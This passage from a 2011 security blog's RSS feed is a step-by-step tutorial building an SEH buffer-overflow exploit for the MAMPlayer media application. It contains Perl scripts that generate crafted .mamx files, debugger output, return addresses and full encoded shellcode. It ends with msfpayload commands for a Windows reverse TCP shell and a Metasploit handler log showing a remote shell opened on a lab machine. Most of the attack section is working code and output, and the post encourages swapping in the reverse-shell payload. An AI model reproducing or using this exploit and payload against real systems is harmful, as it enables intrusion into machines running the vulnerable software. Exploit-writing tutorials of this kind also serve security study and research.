		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1309551.png?w=300" medium="image">
			<media:title type="html">Screenshot-20110328-130955</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-094559.png?w=300" medium="image">
			<media:title type="html">Screenshot-20110328-094559</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1515571.png?w=300" medium="image">
			<media:title type="html">Screenshot-20110327-151557</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1516451.png?w=300" medium="image">
			<media:title type="html">Screenshot-20110327-151645</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1935341.png?w=300" medium="image">
			<media:title type="html">Screenshot-20110327-193534</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1341571.png?w=300" medium="image">
			<media:title type="html">Screenshot-20110328-134157</media:title>
		</media:content>
	</item>
		<item>
		<title>Another SEH tutorial</title>
		<link>https://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/#comments</comments>
		<pubDate>Tue, 15 Feb 2011 08:50:00 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial</guid>
		<description><![CDATA[The application we will look at can be downloaded here. http://www.musanim.com/player/MAMPlayer2006aug19_035.zip The exploit has been documented here, http://www.exploit-db.com/exploits/15901/ but we will go through the process of creating the exploit from scratch. Credits to corelan for their great exploit writing tutorials &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=42&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a><br />
The application we will look at can be downloaded here.</p>
<p>http://www.musanim.com/player/MAMPlayer2006aug19_035.zip</p>
<p>The exploit has been documented here, </p>
<p>http://www.exploit-db.com/exploits/15901/</p>
<p>but we will go through the process of creating the exploit from scratch.<br />
Credits to corelan for their great exploit writing tutorials</p>
<p>Confirm the crash seriously takes place. Fill buffer with around 5000 A`s</p>
<p><font SIZE="1.5">my $filename=&#8221;firstcrash.mamx&#8221;;<br />
my $junk=&#8221;A&#8221;x5000;<br />
my $payload=$junk;<br />
open($FILE,&#8221;&gt;$filename&#8221;);<br />
print $FILE $payload;<br />
close($FILE);<br />
</font><br />
Open the program with windbg as an executable and run it. Open the file firstcrash.mamx and the program crashes. Run f5 or g and confirm with !exchain that this is an SEH problem<br />
<font SIZE="1.5"><br />
0:000&gt;<font color="red"> g</font><br />
(538.440): Access violation &#8211; code c0000005 (first chance)<br />
First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000<br />
eip=41414141 esp=0012f10c ebp=0012f12c iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246<br />
+0x414140f0:<br />
41414141 ??              ???<br />
0:000&gt; <font color="red">!exchain</font><br />
0012f120: ntdll!ExecuteHandler2+3a (7c9032bc)<br />
0012f6b0: MAM2006+3c078 (0043c078)<br />
0012f6ec: MAM2006+3c078 (0043c078)<br />
0012fa60: +414140f0 (41414141)<br />
Invalid exception stack at 41414141<br />
</font><br />
Second, send the 5000`s characters with a metasploit pattern so that we can be able to determine where the exactly the crash takes place.<br />
<font SIZE="1.5"><br />
root@bt:/pentest/exploits/framework3/tools# <font color="red">./pattern_create.rb 5000 &gt; /home/chalo/pgm/sploitattion/fat/crash.mamx</font><br />
</font><br />
Open mamplayer with windbg again and open the crash.mamx file. The application crashes again.Press f5 or g. and then run load the byakugan plugin from metasploit to determine the offset.<br />
<font SIZE="1.5"><br />
0:000&gt;<font color="red"> !load byakugan</font><br />
[Byakugan] Successfully loaded!<br />
0:000&gt; <font color="red">!pattern_offset 5000</font><br />
[Byakugan] Control of ecx at offset 116.<br />
[Byakugan] Control of eip at offset 116.<br />
</font><br />
We now need to get a pop pop ret address to use. we can check the dll`s that load for the mamaplayer application and we can use msfpescan in metasploit to look for a workable address. Checking windbg and we notice some dll`s that mamplayer uses<br />
<font SIZE="1.5"><br />
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv<br />
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll<br />
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv<br />
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll<br />
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll<br />
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll<br />
ModLoad: 10000000 10050000   C:\WINDOWS\system32\VBoxOGL.dll<br />
ModLoad: 01780000 017c0000   C:\WINDOWS\system32\VBoxOGLcrutil.dll<br />
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll<br />
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll<br />
</font><br />
We copy over msacm32.drv to our linux box and use msfpescan to get addresses we can use as SEH<br />
<font SIZE="1.5"><br />
root@bt:/pentest/exploits/framework3#<font color="red"> ./msfpescan -p /home/chalo/pgm/sploitattion/fat/msacm32.drv &gt; /home/chalo/pgm/sploitattion/fat/memaddresses.txt</font><br />
root@bt:/home/chalo/pgm/sploitattion/fat#<font color="red"> cat memaddresses.txt | grep &#8220;pop edi; pop esi; &#8220;</font><br />
0x72d11225 pop edi; pop esi; retn 0x000c<br />
0x72d11f39 pop edi; pop esi; retn 0&#215;0004<br />
0x72d1263d pop edi; pop esi; retn 0&#215;0008<br />
0x72d1269c pop edi; pop esi; retn 0&#215;0008<br />
</font><br />
We now need to check how the stack looks like. We put breakpoints in our code<br />
<font SIZE="1.5"><br />
my $filename=&#8221;crash3.mamx&#8221;;<br />
my $junk=&#8221;A&#8221;x112;#116-4<br />
my $nseh=&#8221;\xcc\xcc\xcc\xcc&#8221;;<br />
my $seh=pack(&#8216;V&#8217;,0x72d11f39);<br />
my $shellcode=&#8221;1234567890qwertyuiopasdfghjkl&#8221;;<br />
my $junk2=&#8221;D&#8221; x300;</p>
<p>my $payload=$junk.$nseh.$seh.$shellcode.$junk2;<br />
open($FILE,&#8221;&gt;$filename&#8221;);<br />
print $FILE $payload;<br />
close($FILE);<br />
</font><br />
Lets check the stack.<br />
<font SIZE="1.5"><br />
0:000&gt;<font color="red"> g</font><br />
(88.4ac): Break instruction exception &#8211; code 80000003 (first chance)<br />
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8<br />
eip=0012fa60 esp=0012f07c ebp=0012f08c iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246<br />
+0x12fa0f:<br />
0012fa60 cc              int     3<br />
0:000&gt;<font color="red"> d eip</font><br />
0012fa60  cc cc cc cc 39 1f d1 72-31 32 33 34 35 36 37 38  &#8230;.9..r12345678<br />
0012fa70  39 30 61 62 63 64 65 66-67 68 69 6a 6b 6c 6d 6e  90abcdefghijklmn<br />
0012fa80  6f 70 71 72 73 74 75 76-77 78 79 7a 44 44 44 44  opqrstuvwxyzDDDD<br />
0012fa90  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012faa0  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fab0  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fac0  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fad0  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
</font><br />
Good, no spaces between our code. Now we just need to set our next seh handler(nseh) to jump 6 bytes. Replace the shellcode with break points .<br />
<font SIZE="1.5"><br />
my $filename=&#8221;crash3.mamx&#8221;;<br />
my $junk=&#8221;A&#8221;x112;#116-4<br />
my $nseh=&#8221;\xeb\x06\x90\x90&#8243;;<br />
my $seh=pack(&#8216;V&#8217;,0x72d11f39);<br />
my $shellcode=&#8221;\xcc\xcc\xcc\xcc&#8221;;<br />
my $junk2=&#8221;D&#8221; x300;</p>
<p>my $payload=$junk.$nseh.$seh.$shellcode.$junk2;<br />
open($FILE,&#8221;&gt;$filename&#8221;);<br />
print $FILE $payload;<br />
close($FILE);<br />
</font><br />
Checking the stack again<br />
<font SIZE="1.5"><br />
0:000&gt; <font color="red">g</font><br />
(3a8.5f0): Break instruction exception &#8211; code 80000003 (first chance)<br />
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8<br />
eip=0012fa68 esp=0012f07c ebp=0012f08c iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246<br />
+0x12fa17:<br />
0012fa68 cc              int     3<br />
0:000&gt; <font color="red">d eip</font><br />
0012fa68  cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44  &#8230;.DDDDDDDDDDDD<br />
0012fa78  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fa88  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fa98  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012faa8  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fab8  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fac8  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
0012fad8  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD<br />
</font><br />
Replace the breakpoints with real shellcode to pop a calc from msfpayload and pwn the application.<br />
<font SIZE="1.5"><br />
chalo@bt:/pentest/exploits/framework3$ <font color="red">./msfpayload  windows/exec EXITFUNC=seh CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c</font><br />
</font><br />
So the new code becomes<br />
<font SIZE="1.5"><br />
my $filename=&#8221;crash5.mamx&#8221;;<br />
my $junk=&#8221;A&#8221;x112;#116-4<br />
my $nseh=&#8221;\xeb\x06\x90\x90&#8243;;<br />
my $seh=pack(&#8216;V&#8217;,0x72d11f39);</p>
<p>my $shellcode =<br />
&#8220;\x89\xe1\xda\xcb\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43&#8243; .<br />
&#8220;\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41&#8243; .<br />
&#8220;\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42&#8243; .<br />
&#8220;\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50&#8243; .<br />
&#8220;\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30\x45&#8243; .<br />
&#8220;\x50\x45\x50\x43\x50\x4b\x39\x5a\x45\x56\x51\x4e\x32\x52\x44&#8243; .<br />
&#8220;\x4c\x4b\x56\x32\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x56&#8243; .<br />
&#8220;\x32\x52\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x51\x5a&#8221; .<br />
&#8220;\x51\x36\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c\x43&#8243; .<br />
&#8220;\x51\x43\x4c\x45\x52\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d&#8221; .<br />
&#8220;\x45\x51\x4f\x37\x4b\x52\x4c\x30\x50\x52\x56\x37\x4c\x4b\x56&#8243; .<br />
&#8220;\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c\x4b&#8221; .<br />
&#8220;\x47\x30\x52\x58\x4d\x55\x49\x50\x52\x54\x50\x4a\x45\x51\x4e&#8221; .<br />
&#8220;\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47\x50&#8243; .<br />
&#8220;\x45\x51\x4e\x33\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x50\x34\x4c&#8221; .<br />
&#8220;\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x56\x51\x4f\x30\x4e\x4c&#8221; .<br />
&#8220;\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x54&#8243; .<br />
&#8220;\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56\x44&#8243; .<br />
&#8220;\x52\x55\x4d\x32\x51\x48\x4c\x4b\x50\x58\x47\x54\x45\x51\x49&#8243; .<br />
&#8220;\x43\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c&#8221; .<br />
&#8220;\x43\x31\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4b&#8221; .<br />
&#8220;\x39\x50\x44\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x51\x49&#8243; .<br />
&#8220;\x51\x4a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a\x4c&#8221; .<br />
&#8220;\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x43\x5a\x43\x31\x4c\x4d&#8221; .<br />
&#8220;\x4c\x45\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x43\x58\x56&#8243; .<br />
&#8220;\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x4b\x4e&#8221; .<br />
&#8220;\x54\x4e\x47\x42\x4b\x5a\x52\x48\x49\x36\x5a\x35\x4f\x4d\x4d&#8221; .<br />
&#8220;\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30&#8243; .<br />
&#8220;\x4b\x4b\x4d\x30\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53\x52&#8243; .<br />
&#8220;\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43\x53&#8243; .<br />
&#8220;\x43\x51\x52\x4c\x52\x43\x56\x4e\x45\x35\x52\x58\x43\x55\x43&#8243; .<br />
&#8220;\x30\x54\x4a\x41\x41&#8243;;</p>
<p>my $junk2=&#8221;D&#8221; x300;<br />
my $payload=$junk.$nseh.$seh.$shellcode.$junk2;<br />
open($FILE,&#8221;&gt;$filename&#8221;);<br />
print $FILE $payload;<br />
close($FILE);<br />
</font><br />
Open the file with the application and you will be able to pop a calc. You can modify the shellcode to do taks such as reverse shell on a tcp port.<br />
<font SIZE="1.5"><br />
chalo@bt:/pentest/exploits/framework3$ <font color="red">./msfpayload  windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.10.1 LPORT=4444 R | ./msfencode -e x86/alpha_upper -t c</font><br />
</font><br />
Then change your shellcode above from calc to the new shellcode for reverse shell. Set up your metasploit listener first and then after that open the new file with mamplayer . Boom !!!! <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  You get your reverse shell back</p>
<p><font SIZE="1.5"><br />
msf &gt; <font color="red">use exploit/multi/handler</font><br />
msf exploit(handler) &gt; <font color="red">set PAYLOAD windows/shell/reverse_tcp</font><br />
PAYLOAD =&gt; windows/shell/reverse_tcp<br />
msf exploit(handler) &gt; <font color="red">show options</font></p>
<p>Module options:</p>
<p>Name  Current Setting  Required  Description<br />
&#8212;-  &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;</p>
<p>Payload options (windows/shell/reverse_tcp):</p>
<p>Name      Current Setting  Required  Description<br />
&#8212;-      &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
EXITFUNC  process          yes       Exit technique: seh, thread, none, process<br />
LHOST                      yes       The listen address<br />
LPORT     4444             yes       The listen port</p>
<p>Exploit target:</p>
<p>Id  Name<br />
&#8211;  &#8212;-<br />
0   Wildcard Target</p>
<p>msf exploit(handler) &gt; <font color="red">set LHOST 192.168.10.1</font><br />
LHOST =&gt; 192.168.10.1<br />
msf exploit(handler) &gt; <font color="red">set EXITFUNC seh</font><br />
EXITFUNC =&gt; seh<br />
msf exploit(handler) &gt; <font color="red">exploit</font></p>
<p>[*] Started reverse handler on 192.168.10.1:4444<br />
[*] Starting the payload handler&#8230;<br />
[*] Sending stage (240 bytes) to 192.168.10.130<br />
[*] Command shell session 1 opened (192.168.10.1:4444 -&gt; 192.168.10.130:1032) at Wed Jan 12 12:27:51 +0300 2011</p>
<p>Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.</p>
<p>C:\Documents and Settings\bb\Desktop\rr\fat&gt;<font color="red">ipconfig</font><br />
ipconfig</p>
<p>Windows IP Configuration</p>
<p>Ethernet adapter Local Area Connection:</p>
<p>Connection-specific DNS Suffix  . : localdomain<br />
IP Address. . . . . . . . . . . . : 192.168.10.130<br />
Subnet Mask . . . . . . . . . . . : 255.255.255.0<br />
Default Gateway . . . . . . . . . :</p>
<p>C:\Documents and Settings\bb\Desktop\rr\fat&gt;<br />
</font></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/42/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/42/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/42/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/42/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/42/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/42/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/42/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/42/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/42/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/42/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/42/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/42/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/42/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/42/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=42&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>
	</item>
	</channel>
</rss>
